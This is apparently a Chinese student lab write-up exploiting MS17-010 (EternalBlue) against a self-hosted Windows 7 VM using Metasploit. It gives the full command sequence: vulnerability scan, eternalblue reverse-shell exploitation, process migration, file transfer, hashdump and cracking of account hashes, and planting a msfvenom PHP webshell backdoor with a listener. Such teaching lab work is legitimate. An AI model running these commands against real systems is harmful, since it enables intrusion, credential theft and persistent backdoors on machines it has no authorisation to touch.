MS17-010漏洞利用
MS17-010漏洞利用
1.安裝虛擬機win7 x64,實現利用ms17-010實現對其win7 x64主機開始滲透,查看該主機信息,打開遠程桌面,抓取用戶名和密碼並破譯,創建一個 : 學號.txt文件,實現上傳,下載,刪除。
首先啟動win7 x64虛擬機,查看IP地址為192.168.70.139,如下如圖所示:
在win7 x64上搭建wamp網站服務器從上到下依次安裝軟件,如下如所示:
安裝成功後通過瀏覽器訪問192.168.70.139查看是否能正常訪問該網站,如下圖所示:
Ms17-010漏洞的利用
接下來打開kali實現利用ms17-010漏洞,實現對其win7 x64主機進行滲透,首先使用scanner下掃描模塊掃描目標主機是否存在ms17-010的漏洞,如下圖所示:
在kali中輸入以下命令:
命令:
msfconsole
命令:search ms17-010
>use auxiliary/scanner/smb/smb_ms17-010
>set RHOSTS 192.168.70.139
>run
確認目標機器的操作系統及存在漏洞之後便可以進行漏洞攻擊了,輸入命令use exploit/windows/smb/ms17_010_eternalblue
,調用exploit下的ms17_010_eternalblue模塊,並輸入命令show payloads
查看可用的payload,如下圖所示:
輸入命令set payload windows/x64/meterpreter/reverse_tcp
設置payload,並輸入命令show options
查看參數配置,如下圖所示,需要配置的參數為RHOST和LHOST
輸入命令set RHOST 192.168.70.139
配置目標機器的IP地址,輸入命令set LHOST 192.168.70.134
配置kali本地的IP地址,配置完成後輸入命令show options
檢查參數,如下圖所示:
參數配置檢查無誤後,輸入命令run
開始攻擊,並且返回一個meterptrter會話說明已經攻擊成功了,如下圖所示:
後滲透攻擊:信息收集
進程遷移:例如攻擊者利用瀏覽器漏洞攻陷了目標主機,但攻擊滲透後的瀏覽器有可能被用戶關閉,此shell是非常脆弱的,所以獲取shell後的第一步就是移動這個shell,將它和目標主機中一個穩定的進程綁定在一起。
例如:輸入ps
命令獲取目標主機正在運行的進程,如下圖所示:
輸入命令getpid
查看meterperter shell的進程號為2280,如下圖所示:
我們可用使用自動遷移進程命令,系統會自動尋找合適的進程然後進行遷移,輸入自動遷移命令run post/windows/manage/migrate
,執行命令後此時將原先的2280進程號修改為1244,如圖所示:
收集系統信息:獲取了穩定進程之後開始收集系統信息,輸入命令sysinfo
查看目標主機的系統信息,如下圖所示:
捕獲桌面輸入命令screenshot
抓取目標主機的屏幕截圖路徑為/root/bPgQxuoB,jpeg
文件,如下圖所示:
輸入shell
命令進入目標機器shell,如下圖所示:
在shell輸入exit
可用停止shell會話並返回meterperter中,如下圖所示:
上傳文件命令upload
,在kali虛擬機root目錄下存在70zsz.txt文件,其內容為I『m is 70 zsz!,輸入命令upload /root/70zsz.txt c:\\
,此文件上傳到目標機器c:\目錄下,如下圖所示:
輸入shell進入Windows shell查看從c:\目錄下是否有剛剛我們上傳的70zsz.txt文件,如下圖所示:
下載文件命令download
,輸入命令download c:\70zsz.txt/root/download將目標機器c:\下的70zsz.txt下載到本機/root/download中,如下圖所示:
輸入命令rm c:\\70zsz.txt
將目標機器c:\下的70zsz.txt刪除,如下圖所示:
後滲透攻擊:Hash攻擊
使用Hashdump抓取密碼,HashdumpMeterpreter腳本可用從目標機器中提取Hash值,破解Hash值可獲得登錄密碼。計算機中的每個賬號的用戶名和密碼都存儲在sam中,當計算機運行時,該文件對所有賬號進行鎖定,想要訪問就必須有「系統級「的賬號。
在meterpreter shell提示符下輸入hashdump命令,將導出sam數據庫中Hash,如下圖所示:
從圖中我們可用看出,返回了三個用戶賬號,分別為Administrator,Guest,zsz,數據輸出的格式為用戶名:SID:LM哈希:NTLM哈希:::,在zsz賬戶中NTLM哈希進行破解,使用在線破解網站對其進行破解,如//www.cmd5.com/,可以看到結果正是為zsz賬戶的密碼:123456
後滲透攻擊:後門
Meterpreter後門:在Meterpreter中,有一個名為PGP Meterpreter的payload,利用這個模塊可創建具有Meterpreter功能的PHP WebShell,在攻擊中使用Metasploit PHP Shell步驟如下:
1.使用msfvenom創建一個webshell.php
2.上傳webshell.php到目標服務器
3.運行Metasploit multi-handler開始監聽
4.訪問webshell.php頁面
5.獲得反彈Metasploit shell
首先通過Metasploit的msfvenom攻擊製作PHP Meterpreter,輸入命令msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.70.134 -f raw > 070zsz.php
,如下圖所示:
因為目標主機使用了wampserver,因此得知需要上傳070zsz.php文件至目標主機中c:\wamp64\www中,如下圖所示:
輸入exit
返回meterpreter,使用上傳命令upload/root/070zsz.php c:\\wamp64\\www
中,如下圖所示:
輸入exit回到msf,輸入如下命令設置監聽,如下圖所示:
>exit
>use exploit/multi/handler
>set payload php/meterpreter/reverse_tcp
>set LHOST 192.168.70.134
>run
打開瀏覽器,訪問目標機器服務器中070zsz.php文件,即訪問//192.168.70.139/070zsz.php ,結果可以看到服務端反彈shell成功如下圖所示: